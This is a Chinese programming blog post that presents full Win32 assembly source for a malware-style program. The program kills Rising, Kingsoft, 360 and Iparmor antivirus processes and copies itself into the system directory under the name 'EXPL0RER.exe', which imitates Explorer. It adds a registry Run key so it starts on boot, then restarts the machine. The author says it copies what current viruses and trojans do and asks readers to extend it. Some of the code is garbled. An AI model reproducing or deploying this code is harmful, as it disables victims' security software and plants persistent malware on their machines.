Win32汇编关闭防护软件

最新推荐文章于 2024-05-14 20:24:57 发布
最新推荐文章于 2024-05-14 20:24:57 发布
阅读量501 收藏
点赞数 1
分类专栏: Win32汇编 文章标签: 汇编 null command path 杀毒软件 byte
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liusongxn/article/details/2183636
版权

 最近一直在忙于毕业设计的事,没多少时间写东西,好不容易抽点空写了下面的代码,希望能给喜欢编程的朋友做个参考。
以下代码主要实现的是关闭常用杀毒软件功能(现在的流行病毒和木马一般都带有这样的功能),其次是修改注册表、自我复制、重启系统。
由于很多杀毒软件都使用了HOOK OpenProcess()方法,所以瑞星采用了向窗口发消息的形式关闭监控,而卡巴的消息通知码未能找到,所以本代码无法关闭卡巴(还望高手指点)。
代码中使用的ExitWindowsEx()函数的参数已经说明,有兴趣的朋友根据自己需要自作修改。
这种方式是我个人无聊乱写的,不知道是否还有更好的方法,还望请高手指点!

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  .386
  .model flat, stdcall
  option casemap :none   ; case sensitive
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 数据
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include  windows.inc
include  user32.inc
includelib user32.lib
include  kernel32.inc
includelib kernel32.lib
include  advapi32.inc
includelib advapi32.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>      
  .data?
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
hInstance dd   ?
ovi  OSVERSIONINFO  <>
tkp  TOKEN_PRIVILEGES <>
hToken  dd   ?
szSystemPath db   MAX_PATH dup (?) ;系统路径
szMyPath db   MAX_PATH dup (?) ;自身路径
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  .const
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
szShut  db "SeShutdownPrivilege",0
szKeyAutoRun db "Software/Microsoft/Windows/CurrentVersion/Run",0
szFileName db "EXPL0RER.exe",0
szTitle  db "你好!",0
szDisposal db "无心温馨提示你!",0dh,0ah
  db "你今天心情好吗?",0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;安全软件进程相关
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
szRsing  db "#32770",0  ;瑞星窗口类名
szAVP  db "AVP.exe",0  ;卡巴进程名(这里并不能关闭卡巴,只是写在这里,希望高手完成之)
szKAV  db "KAVStart.exe",0 ;金山进程名
sz360tray db "360Tray.exe",0  ;360进程名
szIparmor db "Iparmor.exe",0  ;木马克星进程名
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>   
;代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  .code   
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;获得调试权限
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Popedom proc
mov ovi.dwOSVersionInfoSize,sizeof ovi   
invoke GetVersionEx,addr ovi
   
.if ovi.dwPlatformId == VER_PLATFORM_WIN32_NT   
  invoke GetCurrentProcess   
  invoke OpenProcessToken,eax,TOKEN_ADJUST_PRIVILEGES+TOKEN_QUERY,addr hToken   
  invoke LookupPrivilegeValue,NULL,addr szShut,addr tkp.Privileges[0].Luid   
  mov tkp.PrivilegeCount,1   
  mov tkp.Privileges[0].Attributes,SE_PRIVILEGE_ENABLED   
  invoke AdjustTokenPrivileges,hToken,FALSE,addr tkp,0,NULL,0   
.endif
ret
_Popedom endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;关闭瑞星监控
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_CloseRsing proc
local @hWindows
local @szClassName[20]:byte
invoke GetForegroundWindow
invoke GetWindow,eax,GW_HWNDFIRST
.while eax
  mov ebx,eax
  invoke GetClassName,ebx,addr @szClassName,20
  invoke lstrcmpi,addr @szClassName,addr szRsing
  .if eax == 0
   invoke PostMessage,ebx,WM_COMMAND,40027,NULL
   invoke PostMessage,ebx,WM_COMMAND,2775,NULL
   invoke PostMessage,ebx,WM_COMMAND,32776,NULL  
  .endif
  invoke GetWindow,ebx,GW_HWNDNEXT
.endw
ret
_CloseRsing endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;扫描并关闭几个安全软件
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_CloseDefendsoftware proc
  local @stProcessROCESSENTRY32
  local @hSnapShot
  invoke RtlZeroMemory,addr @stProcess,sizeof @stProcess
  mov @stProcess.dwSize,sizeof @stProcess
  invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
  mov @hSnapShot,eax
  invoke Process32First,@hSnapShot,addr @stProcess
  .while eax
   lea esi,szAVP
   .while TRUE
    invoke lstrcmpi,addr @stProcess.szExeFile,esi
    .if eax == 0
     invoke OpenProcess,PROCESS_ALL_ACCESS,FALSE,@stProcess.th32ProcessID
     .if eax
      mov ebx,eax
      invoke TerminateProcess,ebx,-1
      invoke CloseHandle,ebx
      invoke Sleep,200
     .endif
    .endif
    @@:
    lodsb
    or al,al
    jnz @B
    .break .if ! byte ptr [esi+1]
   .endw
   invoke Process32Next,@hSnapShot,addr @stProcess
  .endw
  ret
_CloseDefendsoftware endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;拷贝自己到系统目录
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_CopyMeToSystem proc uses ebx esi edi
  invoke GetSystemDirectory,addr szSystemPath,MAX_PATH ;获得系统目录
  ;>>>>>>目录最后加上"/"
  invoke lstrlen,addr szSystemPath
  lea ebx,szSystemPath
  add ebx,eax
  xor eax,eax
  mov al,'/'
  .if byte ptr [ebx-1] != al
   mov word ptr [ebx],ax
  .endif
  invoke lstrcat,addr szSystemPath,addr szFileName
  invoke GetModuleFileName,NULL,addr szMyPath,MAX_PATH  ;获得自己的当前目录
  invoke CopyFile,addr szMyPath,addr szSystemPath,FALSE  ;拷贝自身到系统路径
  ret
_CopyMeToSystem endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;修改注册表将自己设为开机自启动
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_RegAmend proc
  local @hKey,@mValue
  local @szBuffer[MAX_PATH]:byte
  
  ;将自己设置为自启动/
  invoke RegCreateKey,HKEY_LOCAL_MACHINE,addr szKeyAutoRun,addr @hKey
  .if eax == ERROR_SUCCESS
   invoke RegSetValueEx,@hKey,addr szFileName,NULL,REG_SZ,/
    addr szSystemPath,sizeof szSystemPath
  .endif
  ret
_RegAmend endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;关机
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Shutdown proc  
;ExitWindwosEx第一参数说明:
;EWX_REBOOT:系统重启
;EWX_SHUTDOWN:关机
;EWX_LOGOFF:注销
;EWX_POWEROFF:待机
invoke ExitWindowsEx,EWX_REBOOT,NULL
ret
_Shutdown endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
invoke _Popedom  ;获得系统权限
invoke Sleep,500
invoke _CloseRsing  ;关闭瑞星监控
invoke _CloseDefendsoftware ;关闭几个常用安全软件
invoke Sleep,500
invoke _CopyMeToSystem
invoke _RegAmend
invoke MessageBox,NULL,addr szDisposal,addr szTitle,MB_YESNO
.if eax == IDYES
  ret
.endif
call _Shutdown
invoke ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

liusongxn
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Win32 多线程学习总结
bcbobo21cn的专栏
04-03 2044
Win32多线程编程学习心得 http://blog.csdn.net/jonathan321/article/details/50782832 博客原文地址:http://jerkwisdom.github.io/study/thread/thread-Summary/ 此处博客不再更新。 为什么多线程? 多线程并不一定是最好的,合适才是最好的。 多线程主要的优点是价
win32汇编教程
09-06
win32汇编教程。汇编基础。 本帮助文件由yyc个人整理后出版,内容全摘自网络。版权归实际作者所有。 为了让网友们能更好的学习Win32汇编编程,于是我为大家将网上的资料整理成一个帮助文件。 本帮助文件包括:...
Win32汇编实现终止进程
Famidlistimo的博客
01-31 663
具体代码实现 .386 ;汇编语言的伪指令 .model flat,stdcall option casemap:none include windows.inc include user32.inc includelib user32.lib include kernel32.inc includelib ...
WIN32汇编: 14.进程
GodDragon的专栏
06-17 892
第十四课 进程本课中我们将学习:什么是进程?如何产生和终止一个进程? 初步知识:进程是什么?下面是我从WIN32 API指南中节选的解释: “一个进程是一个正在执行的应用程序,它包含有:私有的虚拟地址空间、代码、数据和其它的操作系统资源,譬如进程可以存取的管道、文件和同步对象等等。”从上面的定义中您可以看到,一个进程拥有几个对象:地址空间、执行模块和其它该执行程序打开或创建的任
易语言.用修改注册表的方式来关闭win10自带的杀毒软件
追逐光芒,追随内心
09-24 1912
代码没有经过验证,今天遇到一个需求是需要关闭这个win10自带的杀毒软件,大概看了下原理是修改注册表的方式,这个很简单,VB6 或 VC 或易语言都可以实现。
软件安全期末总结
夏日 の blog
07-05 6016
软件自身安全(软件缺陷与漏洞)、恶意软件攻击与检测、软件逆向分析(软件破解)与防护按漏洞可能对系统造成的直接威胁划分获取访问权限漏洞、权限提升漏洞、拒绝服务攻击漏洞、恶意软件植入漏洞、数据丢失或泄露漏洞等按漏洞的成因划分输入验证错误、访问验证错误、竞争条件错误、意外情况处理错误、设计错误、配置错误、环境错误等按漏洞的严重等级划分可分为高、中、低三个级别远程和本地管理员对应为高,普通用户权限、权限提升、读取受限文件远程和本地拒绝服务对应为中,远程非授权文件存取、口令恢复、欺骗。
Win32环境下代码注入与API钩子的实现
保持对编程的热情!
04-02 1015
本文详细的介绍了在Visual Studio(以下简称VS)下实现API钩子的编程方法,阅读本文需要基础:有操作系统的基本知识(进程管理,内存管理),会在VS下编写和调试Win32应用程序和动态链接库(以下简称DLL)。 API钩子是一种高级编程技巧,常常用来完成一些特别的功能,比如词典软件的屏幕取词,游戏修改软件的数据修改等。当然,此技术更多的是被黑客或是病毒用来攻击其它程序,截获需要的数
引发C++软件异常的常见原因分析与总结(实战经验分享)
热门推荐
dvlinker的技术专栏
05-30 4万+
本文根据近几年排查C++软件异常的实践经历与实战经验,详细地总结出引发C++软件异常的常见原因,给大家提供一些借鉴和参考,以帮助大家快速地定位问题。
软件安全笔记
wuuconix's blog
05-15 3682
又考完一门试了,把笔记扔这里吧。 第一章 软件安全概述 1.1软件的概念 软件 = 程序 + 数据 + 文档资料 软件功能 系统软件 支撑软件 应用软件 软件规模 微型、小型、中型、大型、甚大型、极大型 服务对象的范围 面向客户的项目软件 面向市场的产品软件 1.2软件安全的由来 软件应用越来越广泛 软件自身的原因 Connectivity 互联性 Extensibility 拓展性 Complexity 复杂性 黑客攻击方式的进化 传统技术的不足.
红队专题-REVERSE汇编/二进制PWN/逆向/反编译
aming小老弟
10-10 910
ROP(Return-Oriented Programming)链是一种计算机安全领域中的攻击技术,用于绕过内存执行保护措施,实现利用漏洞进行代码注入和控制流劫持。由一系列已存在于程序内存中的代码片段(称为gadget)组成的,这些片段通常是程序的合法指令序列。通过将这些gadget按照特定的顺序串联起来,攻击者可以构造出一条可执行的ROP链,用于实现特定的攻击目的。ROP链的基本原理依赖于已存在的代码片段,而不是插入自定义的恶意代码。这样可以避免执行数据区域中的恶意代码,
tasm32 Win32汇编 编译器下载
02-07
tasm32 Win32汇编 编译器下载 tasm32是Borland公司开发的Win32汇编编译器,被广泛用于各种等编译器,用作中间过渡编译。它也能独立的编译纯汇编或是Win32Asm的代码。具有编译快速,高效的特点,至今依然是汇编开发...
win32汇编语言实现冒泡排序
12-12
win32汇编语言实现冒泡排序,全部的代码插入在文档的最下面。
Win32汇编练习环境
08-05
今晚整理硬盘时发现几年前为了练习Win32汇编(这里推荐罗云彬老师的那本书),自己搭建了一套Win32汇编练习环境,主要组成部分为最新的RadASM和masm32v11,支持类似Visual Studio的解决方案对代码进行管理,以及对...
Win32汇编】定时器例子
09-04
Win32汇编】定时器例子,汇编代码test.asm,资源文件test.rc
鸿蒙内核源码分析 (内核启动篇) | 从汇编到 main ()
maniuT的博客
05-14 837
这应该是系列篇最难写的一篇,全是汇编代码,需大量的底层知识,涉及协处理器,内核镜像重定位,创建内核映射表,初始化模式栈,热启动,到最后熟悉的。
【多电压流程 Multivoltage Flow】- 6.术语汇编
QRBQ
05-14 174
**power switch**:可以为芯片的一部分开关电源的晶体管或晶体管阵列,可以在VDD电源(头开关)或GND(脚开关)处切断电源,从而在不活动期间切断芯片部分的电源。所有这些单元共享相同的电源轨。- **RTL**:寄存器传输级,一种用硬件描述语言(如Verilog或VHDL)编写的数字电路的高级描述,以寄存器之间的数据传输和对数据执行的逻辑操作来表达。- **coarse-grain switching**:一种电源切换策略,对整个块的电源进行开关控制,块内所有晶体管共享一个单一的电源开关。
android手机应用源码Imsdroid语音视频通话源码.rar
最新发布
05-20
android手机应用源码Imsdroid语音视频通话源码.rar
营销计划汇报PPT,市场品牌 推广渠道 产品 营销策略tbb.pptx
05-20
营销计划汇报PPT,市场品牌 推广渠道 产品 营销策略tbb.pptx
win32汇编语言 游戏
12-19
Win32汇编语言游戏是一种利用汇编语言编写的游戏程序,通常是针对Windows操作系统的。这种游戏通常会利用Win32 API来操作图形、音频和输入设备,实现各种游戏功能。 Win32汇编语言游戏通常具有极高的性能,因为汇编...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值